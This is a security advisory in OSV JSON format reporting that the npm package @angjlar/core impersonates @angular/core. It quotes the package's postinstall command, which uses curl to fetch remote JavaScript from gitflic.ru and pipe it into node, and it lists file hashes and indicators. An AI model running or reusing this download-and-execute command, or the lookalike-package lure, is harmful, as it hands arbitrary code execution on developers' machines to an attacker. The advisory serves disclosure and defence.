{"id":"MAL-2026-17534","summary":"Malicious code in @angjlar/core (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (1dc3c51d631036eabc2b2933bcf3b7f2c08fe45d193136641e484456ba55a6d9)\nPackage @angjlar/core impersonates @angular/core: its package.json copies the real Angular project's description ('Angular - the core framework'), author ('angular'), and repository URL (github.com/angular/angular.git), while publishing under the lookalike scope @angjlar. The postinstall lifecycle script in package.json runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js |... node`, fetching unpinned, mutable JavaScript from a non-publisher host (gitflic.ru, proxied through web.archive.org) and piping it to the node interpreter. On `npm install`, this gives the operator of that remote script arbitrary code execution on the installer's machine. The package has no legitimate relationship to Angular; the impersonating metadata exists solely to lure developers who mistype @angular/core into installing the dropper.\n","modified":"2026-10-05T04:15:04.292920890Z","published":"2026-10-05T03:33:23Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-021000","import_time":"2026-10-05T03:57:37.789439508Z","modified_time":"2026-10-05T03:33:23Z","sha256":"1dc3c51d631036eabc2b2933bcf3b7f2c08fe45d193136641e484456ba55a6d9","source":"amazon-inspector","versions":["22.2.1"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@angjlar/core/v/22.2.1"}],"affected":[{"package":{"name":"@angjlar/core","ecosystem":"npm","purl":"pkg:npm/%40angjlar/core"},"versions":["22.2.1"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"evidence_files":[{"path":"package.json","sha256":"98a12002ca46ee184f3c7487fda81ca6b85ebbdb328061ea3161f9facd930860","tlsh":"fb513724e4f48d6323de6254dd2a4943b138495b5c38bd68b3dd009c8f0e61f61beb9a"}],"package_integrity":[{"filename":"core-22.2.1.tgz","hashes":{"sha1":"e57af0c64e2048efdb9a0836b589e9e1101b1e3d","sha512_sri":"sha512-6PSSogtUkcFampRIGQrSIa/PfA/XNig6/KN6EbUgH30Jqyw+vkHUsbVxHP7SD9hVKAtTWwy7FfQ0RsLMHSxZug=="}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angjlar/core/MAL-2026-17534.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}